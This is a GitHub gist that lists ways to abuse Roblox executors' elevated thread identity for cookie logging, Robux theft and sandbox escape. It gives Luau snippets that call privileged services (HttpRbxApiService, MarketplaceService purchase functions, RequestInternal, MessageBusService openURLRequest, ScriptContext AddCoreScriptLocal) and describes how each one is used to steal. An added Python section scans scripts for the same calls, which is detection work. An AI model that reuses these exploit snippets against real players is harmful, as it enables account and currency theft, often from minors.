@fissurectomy
Last active April 22, 2024 16:16
every way possible to achieve RCE or robux stealers in roblox executors

Author: https://github.com/fissurectomy Telegram: https://t.me/fissurectomy Discord: fissurectomy

This will include every way possible to abuse a Roblox Executor to cookie log accounts, steal robux, or even achieve Remote Code Execution.

I found all these vulnerabilities while testing the security of mobile executors and I found them in under an hour. I wanted to show just how shit of a developer rexidtc is. Rexi contributed to most mobile executors (Codex, Hydrogen, Delta and more.)

I recommend that you avoid using the executors that I have mentioned above. Rexidtc was the owner of KittenMilk, which was known to be a malicious executor in the past. On the other hand, Furky, the owner of Codex, was suspected by the exploiting community to be using the user's device to mine cryptocurrency, resulting in a significant performance decrease. Oh and, a funny fact about Furky is that he once tried to argue that DLLs existed on mobile, and it shows how much of a script kiddie he is.

If you're on PC and use BlueStacks to exploit, I recommend buying Electron. If you're on mobile, I recommend getting Fluxus.

HttpRbxApiService

You can abuse Roblox's HttpRbxApiService, which is normally accessible only to CoreScripts. Because executors run with a thread level of 8, you have the permissions to use the service!

The Luau code below sends an account-authenticated request to the Roblox API to fetch the amount of Robux the user has. The same capability can also be abused to steal Robux, accounts, etc.

local robux = game:GetService("HttpRbxApiService"):GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency")
print(robux)

BrowserService

Roblox's BrowserService was, again, only meant to be accessed by CoreScripts. Exposing this service opens up a ton of critical vulnerabilities, such as cookie grabbing, automatic download of malicious files, execution of potentially malicious JavaScript, and more.

The code below uses the service to open a Google URL.

game:GetService("BrowserService"):OpenBrowserWindow('https://google.com')

GuiService

Just like HttpRbxApiService, this can be abused to send authenticated requests to the Roblox API.

The code below uses the service to open a Google URL. Oh, just realized, the BrowserService and GuiService functions for opening a URL are the same!

game:GetService("GuiService"):OpenBrowserWindow('https://google.com/')

MarketplaceService

MarketplaceService has a lot of functions that can be used to steal a Roblox account's Robux.

The code below lists all the functions that are used to steal an account's Robux.

local m = game:GetService("MarketplaceService")

-- gets the account's balance and prints it
local r = m:GetRobuxBalance()
print(r)

-- below can be used to steal robux
-- if you wish to see the function's required parameters, check the docs: https://robloxapi.github.io/ref/class/MarketplaceService.html
m:PerformPurchase()
m:PerformPurchaseV2()
m:PromptNativePurchaseWithLocalPlayer()
m:PromptNativePurchase()
m:PromptCollectiblesPurchase()
m:PromptGamePassPurchase()
m:PromptBundlePurchase()
m:PromptThirdPartyPurchase()
m:PromptRobloxPurchase()
m:PromptProductPurchase()
m:PromptPurchase()

-- In the docs, there are also signals that could potentially be fired by an executor's firesignal function. If you have already blocked the functions above in your executor, consider blocking firesignal from firing those malicious signals as well.

HttpService

You've probably already tried sending requests to the Roblox API with HttpService at one point, and it throws the error "HttpService can't access ROBLOX resources."

But did you know that there is an unrestricted function in HttpService, allowing you to send authenticated requests to the API, resulting in Robux Stealer Scripts? Introducing: RequestInternal!

game:GetService("HttpService"):RequestInternal({Url = "https://www.google.com/"})

OpenCloudService

OpenCloudService is a new Service added to Roblox, and again, it allowed you to send authenticated requests to the Roblox API.

game:GetService("OpenCloudService"):HttpRequestAsync({
Url = 'https://google.com'
})

MessageBusService

Credits to James Napora for this one.

We can abuse MessageBusService to access the openUrlRequest messages which lets us escape the sandbox, resulting in an RCE or Remote Code Execution vulnerability.

game:GetService("MessageBusService"):Publish(game:GetService("MessageBusService"):GetMessageId("Linking", "openURLRequest"), {url = "notepad.exe"})

game:HttpGet

In most Roblox loadstring scripts, you might've seen "game:HttpGet" after it. That's the function that sends the GET request to a specific URL to grab a script, and loadstring is the one that loads the Luau code found at the URL provided.

This can be abused by sending authenticated requests to the Roblox API, resulting in Robux Stealers, Account Stealers and more.

game:HttpGet('REPLACE THIS WITH ROBLOX API URL')

request Function

The Roblox Unified Naming Convention, aka UNC, has a custom function called "request"; its aliases include http_request, http, syn.request and more. And since 99% of executors support UNC, this becomes critical.

This can be abused to send authenticated requests to the Roblox API.

request({
  Url = 'https://google.com',
  Method = 'GET' -- POST can also be used
})

-- for POST requests, add the application/json header

Bypassing blocked functions with ScriptContext

Check James Napora's GitHub Gist for more information.

Basically, this uses ScriptContext to create a CoreScript, parent it to an actor, and elevate its thread identity to 8, allowing you to use the functions above even if they were blocked.

game:GetService("ScriptContext"):AddCoreScriptLocal("CoreScripts/ProximityPrompt", actor)

And that was all the critical vulnerabilities! I didn't spend much time finding the vulns, and I'm not wasting time on it again. However, if there's any critical vulnerability you would like me to put here, just contact me and I'll add it.
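
For anyone reviewing a script before running it, or building the blocklist mentioned in the MarketplaceService section, the services and methods named above can be turned into a static check. The Python scanner below is an added example, not part of the original gist; its rule names and the sample script are constructed for illustration, and text matching like this is a heuristic, not a replacement for blocking the calls inside the executor.

```python
import re

# Services the page describes as CoreScript-only: any GetService reference is flagged.
SERVICES = ("HttpRbxApiService", "BrowserService", "MessageBusService", "OpenCloudService")
# Method names the page singles out on otherwise legitimate services.
METHODS = (r"OpenBrowserWindow|RequestInternal|AddCoreScriptLocal|GetRobuxBalance"
           r"|PerformPurchase\w*|Prompt\w*Purchase\w*")

RULES = [
    ("privileged-service",
     re.compile(r"GetService\s*\(\s*[\"'](%s)[\"']" % "|".join(SERVICES))),
    ("privileged-method", re.compile(r"[:.]\s*(%s)\s*\(" % METHODS)),
    # HttpGet/request are normal in loader scripts, so only Roblox hosts are flagged.
    ("roblox-api-url", re.compile(r"https?://([\w.-]*\broblox\.com)\b", re.I)),
]

def scan(script):
    """Return (line_number, rule, matched_name) for every hit in a Luau script."""
    findings = []
    for number, line in enumerate(script.splitlines(), start=1):
        code = line.split("--", 1)[0]  # drop line comments (heuristic)
        for rule, pattern in RULES:
            for match in pattern.finditer(code):
                findings.append((number, rule, match.group(1)))
    return findings

# Constructed sample input: a benign loader line plus calls taken from the page.
SAMPLE = '''\
loadstring(game:HttpGet("https://example.com/ui.lua"))()
local m = game:GetService("MarketplaceService")
print(m:GetRobuxBalance()) -- m:PerformPurchase() in a comment is ignored
game:GetService('BrowserService'):OpenBrowserWindow('https://google.com')
request({Url = "https://economy.roblox.com/v1/user/currency", Method = "GET"})
'''

if __name__ == "__main__":
    for number, rule, name in scan(SAMPLE):
        print(f"line {number}: {rule}: {name}")
```
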

@DannyH3103

👍Good post
